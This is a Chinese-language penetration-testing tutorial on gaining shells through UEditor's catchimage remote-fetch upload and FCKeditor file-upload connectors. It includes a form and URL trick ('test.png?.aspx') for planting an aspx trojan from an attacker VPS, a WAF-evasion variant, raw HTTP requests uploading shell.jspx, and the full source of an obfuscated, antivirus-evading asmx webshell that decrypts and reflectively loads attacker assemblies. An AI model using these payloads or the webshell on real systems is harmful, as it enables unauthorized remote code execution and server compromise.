渗透测试 – Ueditor 漏洞捡漏

Ueditor 漏洞捡漏

到 github 上下载

https://github.com/fex-team/ueditor

渗透测试 - Ueditor 漏洞捡漏

下载完成后把压缩包解压后重命名为 ueditor,新建一个目录,把 ueditor 放到 test 文件夹下

渗透测试 - Ueditor 漏洞捡漏

把 net 目录转化为应用程序

渗透测试 - Ueditor 漏洞捡漏

运行过程报错

渗透测试 - Ueditor 漏洞捡漏

修改 web.config,添加 <customErrors mode="Off"/>

渗透测试 - Ueditor 漏洞捡漏

修改完成后继续出现报错

渗透测试 - Ueditor 漏洞捡漏

在 C:windowstemp 这个文件夹添加 network service 用户的权限即可解决

渗透测试 - Ueditor 漏洞捡漏

搭建完成

渗透测试 - Ueditor 漏洞捡漏

访问首页,会出现如图 403 的页面

渗透测试 - Ueditor 漏洞捡漏

常规的目录扫描

渗透测试 - Ueditor 漏洞捡漏

访问 login.html 为简单的登陆页面,这个点是用来混淆视线的,直接跳过

渗透测试 - Ueditor 漏洞捡漏

但我们可以看到目录扫描 ueditor 下存在以下页面,可以联想到 ueditor getshell

渗透测试 - Ueditor 漏洞捡漏
/ueditor/net/controller.ashx?action=
渗透测试 - Ueditor 漏洞捡漏

准备一个 aspx 木马,重命名为 png,并放置到 VPS 上,在该目录下开启 http 服务

python -m SimpleHTTPServer 8080

构造上传表单填入以下地址

<form action="http://192.168.121.189:8081/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
 <p>输入web地址: <input type="text" name="source[]" /></p>
 <input type="submit" value="Submit" />
</form>

在服务器上放置 test.png,表单填入对应的地址

http://x.x.x.x/test.png?.aspx
渗透测试 - Ueditor 漏洞捡漏
渗透测试 - Ueditor 漏洞捡漏

上传后的路径为

/ueditor/net/upload/image/20221026/6380239109238730544736443.aspx
渗透测试 - Ueditor 漏洞捡漏

这时候可能会以为结束了,但是再次访问发现 webshell 不在了

因为我这里设置了一个坑,在该目录下设置了对 aspx 和 ashx 的每隔 20s 的定时删除,但是我们可以上传 asmx

但是如果是默认的 asmx,会直接被 windows defender 干掉

渗透测试 - Ueditor 漏洞捡漏

所以这里还需要上传免杀的 asmx webshell

<%@ WebService LanGuagE="C#" Class="govt" %>
public class govt : u0053u0079u0073u0074u0065u006D.Web.u0053u0065u0072u0076u0069u0063u0065u0073.WebService
{
        [u0053u0079u0073u0074u0065u006D.Web./*AYvToVqOG*/u0053u0065u0072u0076u0069u0063u0065u0073.WebMethod(EnableU00000053U00000065U00000073U00000073U00000069U0000006FU0000006E = true)]
        public string /*pVtVzcOv8Z*/Tas9er(string Tas9er)
        {
			u0053u0079u0073u0074u0065u006D.Text./*p8YVlgO*/u0053u0074u0072u0069u006Eu0067u0042u0075u0069u006Cu0064u0065u0072 govSCi = new u0053u0079u0073u0074u0065u006D/*RknvY69z3Z*/.Text.u0053u0074u0072u0069u006Eu0067u0042u0075u0069u006Cu0064u0065u0072();
            try {
			string govI437x9c = u0053u0079u0073u0074u0065u006D.Text.ASCIIU00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.ASCII.GetString(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067(u0053u0079u0073u0074u0065u006D.Text.ASCIIU00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.ASCII.GetString(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067("VkdGek9XVnk="))));
			string govRRbfsae = "2800b006c42ca583";
			string govw4 = u0053u0079u0073u0074u0065u006D./*PUoWgdIT*/u0042u0069u0074u0043u006Fu006Eu0076u0065u0072u0074u0065u0072/*BfH0QWQEe*/.ToString(new u0053u0079u0073u0074u0065u006D.u0053u0065u0063u0075u0072u0069u0074u0079./*n2H*/u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079./*hpZRU7FTlnvxaX*/U0000004DU00000044U00000035U00000043U00000072U00000079U00000070U00000074U0000006FU00000053U00000065U00000072U00000076U00000069U00000063U00000065U00000050U00000072U0000006FU00000076U00000069U00000064U00000065U00000072()/*OaYl4gLbRQdW*/./*GLYXrw*/ComputeHash/*JBBGQiO8c2ol*/(u0053u0079u0073u0074u0065u006D./*IgRxR9LBNLdyOI*/Text./*RSQ7leSOsyTWLlT*/U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govI437x9c + govRRbfsae)))./*I6sRO*/Replace/*J*/("-", "");
			byte[] gov4b0J = /*ZULKaq*/u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074.U00000046U00000072U0000006FU0000006DU00000042U00000061U00000073U00000065U00000036U00000034U00000053U00000074U00000072U00000069U0000006EU00000067/*x6E7V3q*/(u0053u0079u0073u0074u0065u006D.Web.HttpUtility./*bXFLiBPrPz*/UrlDecode(Tas9er));
			gov4b0J = new u0053u0079u0073u0074u0065u006D./*L27*/u0053u0065u0063u0075u0072u0069u0074u0079./*MNwFb6K1UEZlKg*/u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079.u0052u0069u006Au006Eu0064u0061u0065u006Cu004Du0061u006Eu0061u0067u0065u0064()/*gHR5gB*/.CreateDecryptor/*RGVmPLA*/(/*1Zo6f*/u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067./*q2*/Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae), u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default./*m6VFD3*/U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae))./*N*/u0054u0072u0061u006Eu0073u0066u006Fu0072u006Du0046u0069u006Eu0061u006Cu0042u006Cu006Fu0063u006B(gov4b0J, 0, gov4b0J.Length);
			if (/*PKOt8*/Context./*6Ve6NcYTCUMR*/U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E["payload"] == null) 
			{ Context.U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E/*7eRBnVsdy9xpn6M*/["payload"] = (u0053u0079u0073u0074u0065u006D./*OzT2D4qE*/U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E./*LLZ9*/u0041u0073u0073u0065u006Du0062u006Cu0079)typeof(u0053u0079u0073u0074u0065u006D.U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E.u0041u0073u0073u0065u006Du0062u006Cu0079).GetMethod("Load", new u0053u0079u0073u0074u0065u006D/*I*/.Type[] { typeof(byte[]) }).Invoke(null, new object[] { gov4b0J }); ; } 
			else { object govuMp04AfvJ0JsnQ = ((u0053u0079u0073u0074u0065u006D.U00000052U00000065U00000066U0000006CU00000065U00000063U00000074U00000069U0000006FU0000006E/*FkIst*/.u0041u0073u0073u0065u006Du0062u006Cu0079/*NYWAs1*/)Context.U00000053U00000065U00000073U00000073U00000069U0000006FU0000006E["payload"]).CreateInstance("LY");
			u0053u0079u0073u0074u0065u006D.u0049u004F./*ZEz8kkK8Ubl*/MemoryStream govH7zQ8 = new u0053u0079u0073u0074u0065u006D.u0049u004F.MemoryStream();
			govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(Context);
			govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(govH7zQ8);
			govuMp04AfvJ0JsnQ.U00000045U00000071U00000075U00000061U0000006CU00000073(gov4b0J);
			govuMp04AfvJ0JsnQ.ToString()/*jp9E9a*/;
			byte[] govki9HTZ9d2d = govH7zQ8./*VzzU1VIvbF*/ToArray();
			govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064(govw4.u0053u0075u0062su0074u0072u0069u006Eu0067(0, 16));
			govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064/*pKfdqlo*/(u0053u0079u0073u0074u0065u006D.U00000043U0000006FU0000006EU00000076U00000065U00000072U00000074./*8VxHKj7lkDZdlH*/ToBase64String/*ZTWCBpuE6m*/(new u0053u0079u0073u0074u0065u006D.u0053u0065u0063u0075u0072u0069u0074u0079.u0043u0072u0079u0070u0074u006Fu0067u0072u0061u0070u0068u0079/*xW4*/.u0052u0069u006Au006Eu0064u0061u0065u006Cu004Du0061u006Eu0061u0067u0065u0064()./*qO*/CreateEncryptor(u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae), u0053u0079u0073u0074u0065u006D.Text.U00000045U0000006EU00000063U0000006FU00000064U00000069U0000006EU00000067.Default.U00000047U00000065U00000074U00000042U00000079U00000074U00000065U00000073(govRRbfsae)).u0054u0072u0061u006Eu0073u0066u006Fu0072u006Du0046u0069u006Eu0061u006Cu0042u006Cu006Fu0063u006B(govki9HTZ9d2d, 0, govki9HTZ9d2d.Length)));
			govSCi.U00000041U00000070U00000070U00000065U0000006EU00000064(govw4.u0053u0075u0062su0074u0072u0069u006Eu0067(16)); } }
			catch (u0053u0079u0073u0074u0065u006D/*wxc47AGjEiDvg*/.Exception) { }
			return govSCi.ToString();
		}
}

最终成功 getshell

渗透测试 - Ueditor 漏洞捡漏

在实战中还可能会遇到 waf 的拦截

渗透测试 - Ueditor 漏洞捡漏

这时候通过中间穿插其他字符有可能绕过

http://x.x.x.x/test.png?.?a?s?p?x

Fckeditor 漏洞捡漏

在应用下访问下面路径,如果状态码为 200

/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

且存在如下界面,不存在的话也可以盲试

渗透测试 - Ueditor 漏洞捡漏
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1
Host: 192.168.85.205:8080
Content-Length: 864
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.85.205:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTlvhCuZ9au16UR8X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.85.205:8080/hrms/fckeditor/editor/filemanager/browser/default/frmupload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryTlvhCuZ9au16UR8X
Content-Disposition: form-data; name="NewFile"; filename="shell.jspx"
Content-Type: application/octet-stream

xxxxxxxxx
------WebKitFormBoundaryTlvhCuZ9au16UR8X--
渗透测试 - Ueditor 漏洞捡漏
POST /fckeditor/editor/filemanager/upload/simpleuploader?Type=test1 HTTP/1.1
Host: 192.168.85.205:8080
Content-Length: 864
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.85.205:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybSzSW2Jr2GrbTJAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.85.205:8080/ctop/editor/filemanager/browser/default/frmupload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarybSzSW2Jr2GrbTJAA
Content-Disposition: form-data; name="NewFile"; filename="shell.jspx"
Content-Type: application/octet-stream

xxxxxxxxx
------WebKitFormBoundarybSzSW2Jr2GrbTJAA--

shell 的链接地址为:

http(s)://x.x.x.x/UserFiles/test1/shell.jspx
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容